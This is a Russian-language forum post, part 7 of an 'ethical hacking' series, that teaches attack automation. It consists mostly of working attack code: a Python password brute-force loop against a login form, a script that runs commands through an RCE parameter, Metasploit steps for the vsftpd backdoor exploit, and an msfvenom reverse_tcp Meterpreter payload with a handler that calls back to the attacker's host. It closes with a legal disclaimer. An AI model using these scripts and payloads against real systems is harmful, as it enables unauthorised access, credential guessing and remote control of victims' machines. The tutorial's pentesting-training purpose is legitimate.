HMCoba
Форумчанин
		- Регистрация
 - 14.06.2025
 
- Сообщения
 - 30
 
- Реакции
 - 42
 
Автоматизация атак с помощью Python и работа с Metasploit
- Часть 1 — Введение в этичный хакинг
 - Часть 2 — Установка Kali Linux и создание тестовой среды
 - Часть 3 — Тестирование уязвимостей веб-приложений
 - Часть 4 — Продвинутые атаки и анализ окружения
 - Часть 5 — Повышение привилегий: путь к root
 - Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
 - Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit
 
Ручное выполнение одних и тех же действий — медленно и неэффективно.
Скрипты на Python позволяют:
- Перебрать логины/пароли
 - Автоматизировать поиск уязвимостей
 - Подключаться к целям и загружать полезную нагрузку
 
Цель — отправить десятки логинов и паролей на сайт и посмотреть, сработает ли что-то.
		Python:
	
	import requests
url = "http://target.site/login"
user = "admin"
passwords = ["123456", "password", "admin123", "toor"]
for pwd in passwords:
    data = {"username": user, "password": pwd}
    r = requests.post(url, data=data)
 
    if "Добро пожаловать" in r.text:
        print(f"[+] Успешно: {user}:{pwd}")
        break
    else:
        print(f"[-] Ошибка: {pwd}")
	Если у вас есть уязвимость Remote Command Execution (например, через GET-параметр):
		Python:
	
	import requests
url = "http://target.site/vuln.php"
payloads = ["id", "whoami", "uname -a"]
for cmd in payloads:
    r = requests.get(url, params={"cmd": cmd})
    print(f"$ {cmd}\n{r.text.strip()}\n")
	Это полезно для быстрого сбора системной информации.
Metasploit — один из главных инструментов пентестера. Он содержит сотни эксплойтов, сканеров и полезных загрузчиков.
Запуск Metasploit:
		Код:
	
	msfconsole
	Откроется интерактивная консоль. Ниже — минимальный сценарий атаки.
1. Запустить консоль:
		Код:
	
	msfconsole
	2. Найти эксплойт:
		Код:
	
	search vsftpd
	3. Выбрать эксплойт:
		Код:
	
	use exploit/unix/ftp/vsftpd_234_backdoor
	4. Указать цель:
		Код:
	
	set RHOSTS 192.168.1.10
	5. Запустить:
		Код:
	
	run
	Если успешно — будет открыт shell.
		Код:
	
	msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf
	–
-p — используемый payload–
LHOST/LPORT — IP и порт атакующего–
-f elf — формат для Linux–
> shell.elf — сохранить в файлЗагрузите
shell.elf на сервер и сделайте исполняемым:
		Код:
	
	chmod +x shell.elf
./shell.elf
	На атакующей стороне запустите обработчик:
		Код:
	
	use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run
	
		Код:
	
	sysinfo       — информация о системе
getuid        — под кем мы сейчас
shell         — перейти в обычный bash
upload file   — загрузить файл
download file — скачать файл
	- Как с помощью Python автоматизировать атаки на форму входа
 - Как выполнять команды на удалённой машине через RCE
 - Как использовать Metasploit и msfvenom
 - Как сгенерировать шелл и подключиться через Meterpreter
 
Все действия допустимы только в рамках учебной среды или с прямого согласия владельца системы.
Несанкционированный доступ квалифицируется как преступление и может повлечь за собой уголовную ответственность.
			
				Последнее редактирование: 
			
		
	
								
								
									
	
		
			
		
	
								
							
							
	